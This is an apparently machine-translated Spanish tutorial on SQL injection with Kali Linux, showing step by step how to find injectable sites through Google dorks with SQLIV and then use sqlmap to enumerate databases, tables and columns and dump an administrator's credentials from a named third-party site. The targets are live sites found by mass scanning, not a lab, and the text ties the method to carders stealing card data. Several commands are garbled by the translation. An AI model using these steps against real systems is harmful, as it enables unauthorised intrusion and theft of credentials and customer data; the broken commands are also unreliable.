Inyección SQL con Kali Linux

Inyección SQL con Kali Linux
El uso de bases de datos para diversos aumentos de gestión de almacenamiento de datos en el desarrollo de aplicaciones web a medida que pasa el tiempo. La base de datos facilita la interacción entre usuarios y servidores. La base de datos (o en términos del sistema de gestión de bases de datos abreviado en DMBS) proporciona varios beneficios, incluida la entrada de datos y el almacenamiento, la recuperación de una gran información y la facilidad de compilar y agrupar información.

Pero, además de la facilidad y las características que ofrece la base de datos, así como los muchos usos de las bases de datos en el mundo de la información y la tecnología, especialmente en el desarrollo de un sitio web. Incesionantes pentesteros y piratas informáticos están tratando de encontrar una brecha en la seguridad de la base de datos. Esto es confirmado por el informe emitido por los investigadores de tecnologías positivas, los Centros de Investigación de Seguridad de la Información en Europa, en el segundo trimestre de 2017, los 10 ataques de aplicaciones web principales estaban dominados por la escritura de 39 sitios de 39.1% e inyección de SQL de 24.9%. Positive Technologies dijo que el informe en el segundo trimestre no es muy diferente del primer trimestre.

Figura 1. Top 10 ataques de aplicaciones web (fuente PTSecurity.com)

Esto es interesante y preocupante, porque en una base de datos hay mucha información como cuentas de credenciales (administrador y usuario), detalles de información financiera (como tarjetas de crédito, cuentas bancarias, etc.) etcétera. Además, hacer ataques de inyección SQL no siempre requiere capacidades de inyección de expertos, en el sentido, los niños pueden hacerlo. Porque hay muchas aplicaciones gratuitas que pueden realizar una inyección SQL automáticamente, como SQLMAP. SQLMAP es una aplicación de código abierto para actividades de prueba de penetración que tiene como objetivo realizar ataques de inyección SQL en un orificio de seguridad de la base de datos automáticamente. Aquí te mostraré cómo hacer inyección SQL usando SQLMAP en Linux Kali. No se requieren capacidades especiales, pero valdrá más si domina un lenguaje de secuencias de comandos o tecnología de base de datos SQL.

Este tutorial se recomienda para aquellos que son nuevos en la inyección SQL en Kali Linux, solo por diversión, o que quieren ver cómo funciona la inyección SQL. No se recomienda a esos que ya son probadores de penetración altamente calificados.


Hola, soy Bimando, el autor de este artículo. Si le gusta este artículo, eche un vistazo a la compra de mi libro Hacking ético práctico: para probadores de penetración con Kali Linux. Trabajé duro en él con el equipo Linux Suger. Para producir un producto de alta calidad que sé que le encantará y aprenderá mucho.


Inyección SQL usando SQLMAP en Kali Linux

Antes de hacer el ataque de inyección, por supuesto, debemos asegurarnos de que el servidor o el objetivo tengan un orificio de seguridad de la base de datos. Para encontrar agujeros de seguridad de bases de datos, hay varios métodos que podemos usar. Entre ellos, Google Dorking, es utilizado principalmente por hackers y probadores de penetración. Afortunadamente hay una herramienta que puede hacerlo automáticamente. Pero primero tenemos que instalar su herramienta. La herramienta se llama SQLIV (escáner de vulnerabilidad de inyección SQL).

Paso 1: Instale SQLIV en Kali Linux

Escriba los comandos a continuación en su terminal para instalar SQLIV:

~# git clon https: // github.com/hadesy2k/sqliv.git
~# CD sqliv && sudo python2 configuración.py -i

Una vez que SQLIV se instala en su Kali Linux, se almacena en la ruta /usr/bin/sqliv. Que, puede llamar directamente desde el terminal, escribiendo 'sqliv'. Ahora echemos un vistazo a las características de SQLIV.

Paso 2: Encontrar vulnerabilidades de inyección SQL

Usaremos Google Dorking para escanear y encontrar el orificio de inyección SQL en objetivos. Tomemos un idiota simple y vamos a escanear SQLIV a través de cada objetivo y busque una vulnerabilidad de comercio electrónico en el siguiente elemento de patrón de URL '.php?id = '. Para encontrar otros patrones simplemente Google para la "Lista de Dork de Google".

~# sqliv -d inUrl: elemento.php?id = -e google -p 100

Por defecto, SQLIV arrastrará la primera página en el motor de búsqueda, que en Google 10 sitios por página. Así, aquí definimos el argumento -pag 100 para rastrear 10 páginas (100 sitios). Basado en el idiota dado anteriormente, obtuvimos el resultado de URL vulnerables que se ven así:

Encontramos ocho de cien URL escaneados y considerados como vulnerables contra el ataque de inyección SQL. Guarde las URL en el editor de texto para más pasos.

Paso 3: inyección SQL usando SQLMAP

Una vez que obtuvimos al menos un objetivo vulnerable de inyección SQL, luego ejecutamos el ataque usando SQLMAP. Tomo uno de ellos para ser una muestra aquí. En primer lugar, necesitamos revelar el nombre de la base de datos, dentro de la base de datos tiene tablas y columnas, que contienen los datos.

URL objetivo: http: // www.municipio.com/artículo.php?ID = 25

A. Enumerar el nombre de la base de datos:

Patrón de comando:

~# sqlmap -u “URL objetivo” --DBS
-u / --url: URL objetivo
--DBS: Enumerate Database/s Nombre

Entonces, el comando compilado se vería así:

~# sqlmap -u “http: // www.municipio.com/artículo.php?ID = 25 " - -DBS

Desde el comando anterior, el resultado debe verse así

Obtenemos el nombre de la base de datos "municipio".

B. Enumerado nombre de mesas

Patrón de comando:

~# sqlmap -u “URL de destino ' -Database -Nombre -Tablas

Entonces, el comando compilado es así:

~# sqlmap -u "http: // www.municipio.com/artículo.php?ID = 25 "-D Acfurniture -Tablas

El resultado debe verse así:

Hasta ahora, podemos concluir que la disposición de los datos es el sitio municipio.comunicarse tiene dos bases de datos, municipio y información_schema. La base de datos nombrada municipio Contiene cuatro tablas: categoría, producto, producto_hacked, y ajustes. No hay un nombre de tabla comprometido, pero investigemos más. Ve a ver lo que hay dentro ajustes mesa. Dentro de la tabla está en realidad hay columnas y los datos.

C. Enumerar columnas

Patrón de comando:

~# sqlmap -u “URL de tarea '-d -database -name -t table -name -columnas

Entonces, el comando compilado es así:

~# sqlmap -u "http: // www.municipio.com/artículo.php?ID = 25 "-d ACFURNETITUD -T Configuración -Columnas

La salida debe verse así:

El ajustes la tabla consiste en 6 columnas, y esta es en realidad una cuenta de credencial. Vamos a descargar esos datos.

D. Datos de volcado

Patrón de comando:

~# SQLMAP -U “URL de tarea ' -Database -Nombre -Name -T Table -Name -C columnas --dump

Entonces, el comando compilado es así:

~# sqlmap -u "http: // www.municipio.com/artículo.php?ID = 25 "-d Acfurniture -t Configuración -C Nombre de usuario, contraseña --dump

O también puede descargar todos los datos dentro de la tabla, utilizando el comando:

~# sqlmap -u "http: // www.municipio.com/artículo.php?ID = 25 "-d ACFURNETITUD -T Configuración -Dump

La salida debe verse así:

Correo electrónico : [email protected]
Nombre de usuario : Elegante
Contraseña : 9hpko2nkrhbgmywzizxui

Muy bien, hemos terminado de descargar datos en la base de datos utilizando la inyección SQL. Nuestras próximas tareas son para encontrar el puerta o panel de administración, página de inicio de sesión de administrador en los sitios de destino. Antes de hacerlo, asegúrese de si esa contraseña (9hpko2nkrhbgmywzizxui) está encriptada o no, si es así, entonces debemos descifrarla primero. Ese es otro tema, agrietando y descifrando.

Incluso aquí en realidad no estamos pirateando el sitio objetivo, al menos hemos aprendido mucho sobre la inyección de SQL usando SQLMAP en Kali Linux fácilmente y volcamos la cuenta de credenciales. Esta técnica es utilizada principalmente por Carder (hacker que busca una cuenta de tarjeta de crédito en sitios de comercio electrónico) que se dirige a sitios financieros, bancarios, de taller o comercio electrónico que almacena la información de su tarjeta de crédito de usuario.